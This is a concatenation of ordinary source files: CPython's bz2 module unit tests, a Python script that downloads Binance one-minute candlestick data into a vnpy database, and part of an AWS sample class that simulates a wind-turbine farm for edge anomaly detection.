with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteChunks10(self):
with BZ2File(self.filename, "w") as bz2f:
n = 0
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
bz2f.write(str)
n += 1
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteNonDefaultCompressLevel(self):
expected = bz2.compress(self.TEXT, compresslevel=5)
with BZ2File(self.filename, "w", compresslevel=5) as bz2f:
bz2f.write(self.TEXT)
with open(self.filename, "rb") as f:
self.assertEqual(f.read(), expected)
def testWriteLines(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.writelines)
bz2f.writelines(self.TEXT_LINES)
# Issue #1535500: Calling writelines() on a closed BZ2File
# should raise an exception.
self.assertRaises(ValueError, bz2f.writelines, ["a"])
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteMethodsOnReadOnlyFile(self):
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(b"abc")
with BZ2File(self.filename, "r") as bz2f:
self.assertRaises(OSError, bz2f.write, b"a")
self.assertRaises(OSError, bz2f.writelines, [b"a"])
def testAppend(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with BZ2File(self.filename, "a") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT * 2)
def testSeekForward(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekForwardAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(len(self.TEXT) + 150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwards(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def testSeekBackwardsAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
readto = len(self.TEXT) + 100
while readto > 0:
readto -= len(bz2f.read(readto))
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[100-150:] + self.TEXT)
def testSeekBackwardsFromEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150, 2)
self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:])
def testSeekBackwardsFromEndAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-1000, 2)
self.assertEqual(bz2f.read(), (self.TEXT * 2)[-1000:])
def testSeekPostEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwice(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwiceMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPreStart(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT)
def testSeekPreStartMultiStream(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT * 2)
def testFileno(self):
self.createTempFile()
with open(self.filename, 'rb') as rawf:
bz2f = BZ2File(rawf)
try:
self.assertEqual(bz2f.fileno(), rawf.fileno())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.fileno)
def testSeekable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.seekable())
bz2f.read()
self.assertTrue(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
src = BytesIO(self.DATA)
src.seekable = lambda: False
bz2f = BZ2File(src)
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
def testReadable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.readable())
bz2f.read()
self.assertTrue(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
def testWritable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertFalse(bz2f.writable())
bz2f.read()
self.assertFalse(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertTrue(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
def testOpenDel(self):
self.createTempFile()
for i in range(10000):
o = BZ2File(self.filename)
del o
def testOpenNonexistent(self):
self.assertRaises(OSError, BZ2File, "/non/existent")
def testReadlinesNoNewline(self):
# Issue #1191043: readlines() fails on a file containing no newline.
data = b'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t'
with open(self.filename, "wb") as f:
f.write(data)
with BZ2File(self.filename) as bz2f:
lines = bz2f.readlines()
self.assertEqual(lines, [b'Test'])
with BZ2File(self.filename) as bz2f:
xlines = list(bz2f.readlines())
self.assertEqual(xlines, [b'Test'])
def testContextProtocol(self):
f = None
with BZ2File(self.filename, "wb") as f:
f.write(b"xxx")
f = BZ2File(self.filename, "rb")
f.close()
try:
with f:
pass
except ValueError:
pass
else:
self.fail("__enter__ on a closed file didn't raise an exception")
try:
with BZ2File(self.filename, "wb") as f:
1/0
except ZeroDivisionError:
pass
else:
self.fail("1/0 didn't raise an exception")
def testThreading(self):
# Issue #7205: Using a BZ2File from several threads shouldn't deadlock.
data = b"1" * 2**20
nthreads = 10
with BZ2File(self.filename, 'wb') as f:
def comp():
for i in range(5):
f.write(data)
threads = [threading.Thread(target=comp) for i in range(nthreads)]
with support.start_threads(threads):
pass
def testMixedIterationAndReads(self):
self.createTempFile()
linelen = len(self.TEXT_LINES[0])
halflen = linelen // 2
with BZ2File(self.filename) as bz2f:
bz2f.read(halflen)
self.assertEqual(next(bz2f), self.TEXT_LINES[0][halflen:])
self.assertEqual(bz2f.read(), self.TEXT[linelen:])
with BZ2File(self.filename) as bz2f:
bz2f.readline()
self.assertEqual(next(bz2f), self.TEXT_LINES[1])
self.assertEqual(bz2f.readline(), self.TEXT_LINES[2])
with BZ2File(self.filename) as bz2f:
bz2f.readlines()
self.assertRaises(StopIteration, next, bz2f)
self.assertEqual(bz2f.readlines(), [])
def testMultiStreamOrdering(self):
# Test the ordering of streams when reading a multi-stream archive.
data1 = b"foo" * 1000
data2 = b"bar" * 1000
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(data1)
with BZ2File(self.filename, "a") as bz2f:
bz2f.write(data2)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), data1 + data2)
def testOpenBytesFilename(self):
str_filename = self.filename
try:
bytes_filename = str_filename.encode("ascii")
except UnicodeEncodeError:
self.skipTest("Temporary file name needs to be ASCII")
with BZ2File(bytes_filename, "wb") as f:
f.write(self.DATA)
with BZ2File(bytes_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
# Sanity check that we are actually operating on the right file.
with BZ2File(str_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testOpenPathLikeFilename(self):
filename = pathlib.Path(self.filename)
with BZ2File(filename, "wb") as f:
f.write(self.DATA)
with BZ2File(filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testDecompressLimited(self):
"""Decompressed data buffering should be limited"""
bomb = bz2.compress(b'\0' * int(2e6), compresslevel=9)
self.assertLess(len(bomb), _compression.BUFFER_SIZE)
decomp = BZ2File(BytesIO(bomb))
self.assertEqual(decomp.read(1), b'\0')
max_decomp = 1 + DEFAULT_BUFFER_SIZE
self.assertLessEqual(decomp._buffer.raw.tell(), max_decomp,
"Excessive amount of data was decompressed")
# Tests for a BZ2File wrapping another file object:
def testReadBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
self.assertFalse(bio.closed)
def testPeekBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testWriteBytesIO(self):
with BytesIO() as bio:
with BZ2File(bio, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
self.assertEqual(ext_decompress(bio.getvalue()), self.TEXT)
self.assertFalse(bio.closed)
def testSeekForwardBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwardsBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def test_read_truncated(self):
# Drop the eos_magic field (6 bytes) and CRC (4 bytes).
truncated = self.DATA[:-10]
with BZ2File(BytesIO(truncated)) as f:
self.assertRaises(EOFError, f.read)
with BZ2File(BytesIO(truncated)) as f:
self.assertEqual(f.read(len(self.TEXT)), self.TEXT)
self.assertRaises(EOFError, f.read, 1)
# Incomplete 4-byte file header, and block header of at least 146 bits.
for i in range(22):
with BZ2File(BytesIO(truncated[:i])) as f:
self.assertRaises(EOFError, f.read, 1)
class BZ2CompressorTest(BaseTest):
def testCompress(self):
bz2c = BZ2Compressor()
self.assertRaises(TypeError, bz2c.compress)
data = bz2c.compress(self.TEXT)
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
bz2c = BZ2Compressor()
data = bz2c.compress(b'')
data += bz2c.flush()
self.assertEqual(data, self.EMPTY_DATA)
def testCompressChunks10(self):
bz2c = BZ2Compressor()
n = 0
data = b''
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
data += bz2c.compress(str)
n += 1
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
@bigmemtest(size=_4G + 100, memuse=2)
def testCompress4G(self, size):
# "Test BZ2Compressor.compress()/flush() with >4GiB input"
bz2c = BZ2Compressor()
data = b"x" * size
try:
compressed = bz2c.compress(data)
compressed += bz2c.flush()
finally:
data = None # Release memory
data = bz2.decompress(compressed)
try:
self.assertEqual(len(data), size)
self.assertEqual(len(data.strip(b"x")), 0)
finally:
data = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Compressor(), proto)
class BZ2DecompressorTest(BaseTest):
def test_Constructor(self):
self.assertRaises(TypeError, BZ2Decompressor, 42)
def testDecompress(self):
bz2d = BZ2Decompressor()
self.assertRaises(TypeError, bz2d.decompress)
text = bz2d.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressChunks10(self):
bz2d = BZ2Decompressor()
text = b''
n = 0
while True:
str = self.DATA[n*10:(n+1)*10]
if not str:
break
text += bz2d.decompress(str)
n += 1
self.assertEqual(text, self.TEXT)
def testDecompressUnusedData(self):
bz2d = BZ2Decompressor()
unused_data = b"this is unused data"
text = bz2d.decompress(self.DATA+unused_data)
self.assertEqual(text, self.TEXT)
self.assertEqual(bz2d.unused_data, unused_data)
def testEOFError(self):
bz2d = BZ2Decompressor()
text = bz2d.decompress(self.DATA)
self.assertRaises(EOFError, bz2d.decompress, b"anything")
self.assertRaises(EOFError, bz2d.decompress, b"")
@bigmemtest(size=_4G + 100, memuse=3.3)
def testDecompress4G(self, size):
# "Test BZ2Decompressor.decompress() with >4GiB input"
blocksize = 10 * 1024 * 1024
block = random.getrandbits(blocksize * 8).to_bytes(blocksize, 'little')
try:
data = block * (size // blocksize + 1)
compressed = bz2.compress(data)
bz2d = BZ2Decompressor()
decompressed = bz2d.decompress(compressed)
self.assertTrue(decompressed == data)
finally:
data = None
compressed = None
decompressed = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Decompressor(), proto)
def testDecompressorChunksMaxsize(self):
bzd = BZ2Decompressor()
max_length = 100
out = []
# Feed some input
len_ = len(self.BIG_DATA) - 64
out.append(bzd.decompress(self.BIG_DATA[:len_],
max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data without providing more input
out.append(bzd.decompress(b'', max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data while providing more input
out.append(bzd.decompress(self.BIG_DATA[len_:],
max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
# Retrieve remaining uncompressed data
while not bzd.eof:
out.append(bzd.decompress(b'', max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
out = b"".join(out)
self.assertEqual(out, self.BIG_TEXT)
self.assertEqual(bzd.unused_data, b"")
def test_decompressor_inputbuf_1(self):
# Test reusing input buffer after moving existing
# contents to beginning
bzd = BZ2Decompressor()
out = []
# Create input buffer and fill it
self.assertEqual(bzd.decompress(self.DATA[:100],
max_length=0), b'')
# Retrieve some results, freeing capacity at beginning
# of input buffer
out.append(bzd.decompress(b'', 2))
# Add more data that fits into input buffer after
# moving existing data to beginning
out.append(bzd.decompress(self.DATA[100:105], 15))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[105:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_2(self):
# Test reusing input buffer by appending data at the
# end right away
bzd = BZ2Decompressor()
out = []
# Create input buffer and empty it
self.assertEqual(bzd.decompress(self.DATA[:200],
max_length=0), b'')
out.append(bzd.decompress(b''))
# Fill buffer with new data
out.append(bzd.decompress(self.DATA[200:280], 2))
# Append some more data, not enough to require resize
out.append(bzd.decompress(self.DATA[280:300], 2))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_3(self):
# Test reusing input buffer after extending it
bzd = BZ2Decompressor()
out = []
# Create almost full input buffer
out.append(bzd.decompress(self.DATA[:200], 5))
# Add even more data to it, requiring resize
out.append(bzd.decompress(self.DATA[200:300], 5))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_failure(self):
bzd = BZ2Decompressor()
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
# Previously, a second call could crash due to internal inconsistency
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
@support.refcount_test
def test_refleaks_in___init__(self):
gettotalrefcount = support.get_attribute(sys, 'gettotalrefcount')
bzd = BZ2Decompressor()
refs_before = gettotalrefcount()
for i in range(100):
bzd.__init__()
self.assertAlmostEqual(gettotalrefcount() - refs_before, 0, delta=10)
class CompressDecompressTest(BaseTest):
def testCompress(self):
data = bz2.compress(self.TEXT)
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
text = bz2.compress(b'')
self.assertEqual(text, self.EMPTY_DATA)
def testDecompress(self):
text = bz2.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressEmpty(self):
text = bz2.decompress(b"")
self.assertEqual(text, b"")
def testDecompressToEmptyString(self):
text = bz2.decompress(self.EMPTY_DATA)
self.assertEqual(text, b'')
def testDecompressIncomplete(self):
self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10])
def testDecompressBadData(self):
self.assertRaises(OSError, bz2.decompress, self.BAD_DATA)
def testDecompressMultiStream(self):
text = bz2.decompress(self.DATA * 5)
self.assertEqual(text, self.TEXT * 5)
def testDecompressTrailingJunk(self):
text = bz2.decompress(self.DATA + self.BAD_DATA)
self.assertEqual(text, self.TEXT)
def testDecompressMultiStreamTrailingJunk(self):
text = bz2.decompress(self.DATA * 5 + self.BAD_DATA)
self.assertEqual(text, self.TEXT * 5)
class OpenTest(BaseTest):
"Test the open function."
def open(self, *args, **kwargs):
return bz2.open(*args, **kwargs)
def test_binary_modes(self):
for mode in ("wb", "xb"):
if mode == "xb":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "rb") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "ab") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_implicit_binary_modes(self):
# Test implicit binary modes (no "b" or "t" in mode string).
for mode in ("w", "x"):
if mode == "x":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "a") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_text_modes(self):
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
for mode in ("wt", "xt"):
if mode == "xt":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt") as f:
self.assertEqual(f.read(), text)
with self.open(self.filename, "at") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol * 2)
def test_x_mode(self):
for mode in ("x", "xb", "xt"):
unlink(self.filename)
with self.open(self.filename, mode) as f:
pass
with self.assertRaises(FileExistsError):
with self.open(self.filename, mode) as f:
pass
def test_fileobj(self):
with self.open(BytesIO(self.DATA), "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(BytesIO(self.DATA), "rb") as f:
self.assertEqual(f.read(), self.TEXT)
text = self.TEXT.decode("ascii")
with self.open(BytesIO(self.DATA), "rt") as f:
self.assertEqual(f.read(), text)
def test_bad_params(self):
# Test invalid parameter combinations.
self.assertRaises(ValueError,
self.open, self.filename, "wbt")
self.assertRaises(ValueError,
self.open, self.filename, "xbt")
self.assertRaises(ValueError,
self.open, self.filename, "rb", encoding="utf-8")
self.assertRaises(ValueError,
self.open, self.filename, "rb", errors="ignore")
self.assertRaises(ValueError,
self.open, self.filename, "rb", newline="\n")
def test_encoding(self):
# Test non-default encoding.
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
with self.open(self.filename, "wt", encoding="utf-16-le") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("utf-16-le")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt", encoding="utf-16-le") as f:
self.assertEqual(f.read(), text)
def test_encoding_error_handler(self):
# Test with non-default encoding error handler.
with self.open(self.filename, "wb") as f:
f.write(b"foo\xffbar")
with self.open(self.filename, "rt", encoding="ascii", errors="ignore") \
as f:
self.assertEqual(f.read(), "foobar")
def test_newline(self):
# Test with explicit newline (universal newline mode disabled).
text = self.TEXT.decode("ascii")
with self.open(self.filename, "wt", newline="\n") as f:
f.write(text)
with self.open(self.filename, "rt", newline="\r") as f:
self.assertEqual(f.readlines(), [text])
def test_main():
support.run_unittest(
BZ2FileTest,
BZ2CompressorTest,
BZ2DecompressorTest,
CompressDecompressTest,
OpenTest,
)
support.reap_children()
if __name__ == '__main__':
test_main()
|
download_data_demo2.py
|
"""
我们使用币安原生的api进行数据爬取.
"""
import pandas as pd
import time
from datetime import datetime
import requests
import pytz
from vnpy.trader.database import database_manager
pd.set_option('expand_frame_repr', False) #
from vnpy.trader.object import BarData, Interval, Exchange
BINANCE_SPOT_LIMIT = 1000
BINANCE_FUTURE_LIMIT = 1500
CHINA_TZ = pytz.timezone("Asia/Shanghai")
from threading import Thread
def generate_datetime(timestamp: float) -> datetime:
"""
:param timestamp:
:return:
"""
dt = datetime.fromtimestamp(timestamp / 1000)
dt = CHINA_TZ.localize(dt)
return dt
def get_binance_data(symbol: str, exchanges: str, start_time: str, end_time: str):
"""
爬取币安交易所的数据
:param symbol: BTCUSDT.
:param exchanges: 现货、USDT合约, 或者币币合约.
:param start_time: 格式如下:2020-1-1 或者2020-01-01
:param end_time: 格式如下:2020-1-1 或者2020-01-01
:return:
"""
api_url = ''
save_symbol = symbol
gate_way = 'BINANCES'
if exchanges == 'spot':
print("spot")
limit = BINANCE_SPOT_LIMIT
save_symbol = symbol.lower()
gate_way = 'BINANCE'
api_url = f'https://api.binance.com/api/v3/klines?symbol={symbol}&interval=1m&limit={limit}'
elif exchanges == 'future':
print('future')
limit = BINANCE_FUTURE_LIMIT
api_url = f'https://fapi.binance.com/fapi/v1/klines?symbol={symbol}&interval=1m&limit={limit}'
elif exchanges == 'coin_future':
print("coin_future")
limit = BINANCE_FUTURE_LIMIT
f'https://dapi.binance.com/dapi/v1/klines?symbol={symbol}&interval=1m&limit={limit}'
else:
raise Exception('交易所名称请输入以下其中一个:spot, future, coin_future')
start_time = int(datetime.strptime(start_time, '%Y-%m-%d').timestamp() * 1000)
end_time = int(datetime.strptime(end_time, '%Y-%m-%d').timestamp() * 1000)
while True:
try:
print(start_time)
url = f'{api_url}&startTime={start_time}'
print(url)
data = requests.get(url=url, timeout=10, proxies=proxies).json()
"""
[
[
1591258320000, // 开盘时间
"9640.7", // 开盘价
"9642.4", // 最高价
"9640.6", // 最低价
"9642.0", // 收盘价(当前K线未结束的即为最新价)
"206", // 成交量
1591258379999, // 收盘时间
"2.13660389", // 成交额(标的数量)
48, // 成交笔数
"119", // 主动买入成交量
"1.23424865", // 主动买入成交额(标的数量)
"0" // 请忽略该参数
]
"""
buf = []
for l in data:
bar = BarData(
symbol=save_symbol,
exchange=Exchange.BINANCE,
datetime=generate_datetime(l[0]),
interval=Interval.MINUTE,
volume=float(l[5]),
open_price=float(l[1]),
high_price=float(l[2]),
low_price=float(l[3]),
close_price=float(l[4]),
gateway_name=gate_way
)
buf.append(bar)
database_manager.save_bar_data(buf)
# 到结束时间就退出, 后者收盘价大于当前的时间.
if (data[-1][0] > end_time) or data[-1][6] >= (int(time.time() * 1000) - 60 * 1000):
break
start_time = data[-1][0]
except Exception as error:
print(error)
time.sleep(10)
def download_spot(symbol):
"""
下载现货数据的方法.
:return:
"""
t1 = Thread(target=get_binance_data, args=(symbol, 'spot', "2018-1-1", "2019-1-1"))
t2 = Thread(target=get_binance_data, args=(symbol, 'spot', "2019-1-1", "2020-1-1"))
t3 = Thread(target=get_binance_data, args=(symbol, 'spot', "2020-1-1", "2020-11-16"))
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
def download_future(symbol):
"""
下载合约数据的方法。
:return:
"""
t1 = Thread(target=get_binance_data, args=(symbol, 'future', "2019-9-10", "2020-3-1"))
t2 = Thread(target=get_binance_data, args=(symbol, 'future', "2019-3-1", "2020-11-16"))
t1.start()
t2.start()
t1.join()
t2.join()
if __name__ == '__main__':
# 如果你有代理你就设置,如果没有你就设置为 None 或者空的字符串 "",
# 但是你要确保你的电脑网络能访问币安交易所,你可以通过 ping api.binance.com 看看过能否ping得通
proxy_host = "127.0.0.1" # 如果没有就设置为"", 如果有就设置为你的代理主机如:127.0.0.1
proxy_port = 1087 # 设置你的代理端口号如: 1087, 没有你修改为0,但是要保证你能访问api.binance.com这个主机。
proxies = None
if proxy_host and proxy_port:
proxy = f'http://{proxy_host}:{proxy_port}'
proxies = {'http': proxy, 'https': proxy}
symbol = "BTCUSDT"
# download_spot(symbol) # 下载现货的数据.
download_future(symbol) # 下载合约的数据
|
windfarm-checkpoint.py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import threading
import math
import random
import pywt
import numpy as np
import pandas as pd
import logging
import time
import os
from turbine import WindTurbine
from edgeagentclient import EdgeAgentClient
class WindTurbineFarm(object):
"""
This is the application class. It is respoisible for:
- Creating virtual edge devices (as threads)
- Launch one Edge Agent in each virtual device
- Load the Anomaly detection for the Wind Turbine in the Edge Agent
- Launch the Virtual Wind Turbines
- Launch a Edge Agent Client that integrates the Wind Turbine with the Edge Device
- Display the UI
"""
def __init__(self, n_turbines):
self.artifacts_path = os.environ.get("ARTIFACTS_PATH")
self.raw_data = pd.read_csv(f'{self.artifacts_path}/dataset_wind.csv.gz', compression="gzip", sep=',', low_memory=False).values
self.n_turbines = n_turbines
self.turbines = [WindTurbine(i, self.raw_data) for i in range(self.n_turbines)]
self.data_buffer = [[] for i in range(self.n_turbines)]
## launch edge agent clients
self.edge_agent = EdgeAgentClient('/tmp/aws.greengrass.SageMakerEdgeManager.sock')
self.model_meta = [{'model_name':None} for i in range(self.n_turbines)]
# we need to load the statistics computed in the data prep notebook
# these statistics will be used to compute normalize the input
self.raw_std = np.load(f'{self.artifacts_path}/raw_std.npy')
self.mean = np.load(f'{self.artifacts_path}/mean.npy')
self.std = np.load(f'{self.artifacts_path}/std.npy')
# then we load the thresholds computed in the training notebook
# for more info, take a look on the Notebook #2
self.thresholds = np.load(f'{self.artifacts_path}/thresholds.npy')
# configurations to format the time based data for the anomaly detection model
# If you change these parameters you need to retrain your model with the new parameters
self.INTERVAL = 5 # seconds
self.TIME_STEPS = 20 * self.INTERVAL # 50ms -> seg: 50ms * 20
self.STEP = 10
# these are the features used in this application
self.feature_ids = [8, 9, 10, 7, 22, 5, 6] # qX,qy,qz,qw ,wind_seed_rps, rps, voltage
self.n_features = 6 # roll, pitch, yaw, wind_speed, rotor_speed, voltage
self.running = False # running status
# minimal buffer length for denoising. We need to accumulate some sample before denoising
self.min_num_samples = 500
self.max_buffer_size = 500
for idx in range(n_turbines):
for j in range(self.max_buffer_size):
self.__read_next_turbine_sample__(idx)
def __create_dataset__(self, X, time_steps=1, step=1):
"""
This encodes a list of readings into the correct shape
expected by the model. It uses the concept of a sliding window
"""
Xs = []
for i in range(0, len(X) - time_steps, step):
v = X[i:(i + time_steps)]
Xs.append(v)
return np.array(Xs)
def __euler_from_quaternion__(self, x, y, z, w):
"""
Convert a quaternion into euler angles (roll, pitch, yaw)
roll is rotation around x in radians (counterclockwise)
pitch is rotation around y in radians (counterclockwise)
yaw is rotation around z in radians (counterclockwise)
"""
t0 = +2.0 * (w * x + y * z)
t1 = +1.0 - 2.0 * (x * x + y * y)
roll_x = math.atan2(t0, t1)
t2 = +2.0 * (w * y - z * x)
t2 = +1.0 if t2 > +1.0 else t2
t2 = -1.0 if t2 < -1.0 else t2
pitch_y = math.asin(t2)
t3 = +2.0 * (w * z + x * y)
t4 = +1.0 - 2.0 * (y * y + z * z)
yaw_z = math.atan2(t3, t4)
return roll_x, pitch_y, yaw_z # in radians
def __wavelet_denoise__(self, data, wavelet, noise_sigma):
'''
Filter accelerometer data using wavelet denoising
Modification of F. Blanco-Silva's code at: https://goo.gl/gOQwy5
'''
wavelet = pywt.Wavelet(wavelet)
levels = min(5, (np.floor(np.log2(data.shape[0]))).astype(int))
# Francisco's code used wavedec2 for image data
wavelet_coeffs = pywt.wavedec(data, wavelet, level=levels)
threshold = noise_sigma*np.sqrt(2*np.log2(data.size))
new_wavelet_coeffs = map(lambda x: pywt.threshold(x, threshold, mode='soft'), wavelet_coeffs)
return pywt.waverec(list(new_wavelet_coeffs), wavelet)
def __del__(self):
"""Destructor"""
self.halt()
def is_noise_enabled(self, turbine_id):
return [self.turbines[turbine_id].is_noise_enabled('Vib'),
self.turbines[turbine_id].is_noise_enabled('Rot'),
self.turbines[turbine_id].is_noise_enabled('Vol')]
def __data_prep__(self, turbine_id, buffer):
"""
This method is called for each reading.
Here we do some data prep and accumulate the data in the buffer
for denoising
"""
new_buffer = []
for data in buffer:
roll,pitch,yaw = self.__euler_from_quaternion__(
data[self.feature_ids[0]],data[self.feature_ids[1]],
data[self.feature_ids[2]],data[self.feature_ids[3]]
)
row = [roll,pitch,yaw, data[self.feature_ids[4]],data[self.feature_ids[5]], data[self.feature_ids[6]]]
new_buffer.append(row)
return np.array(new_buffer)
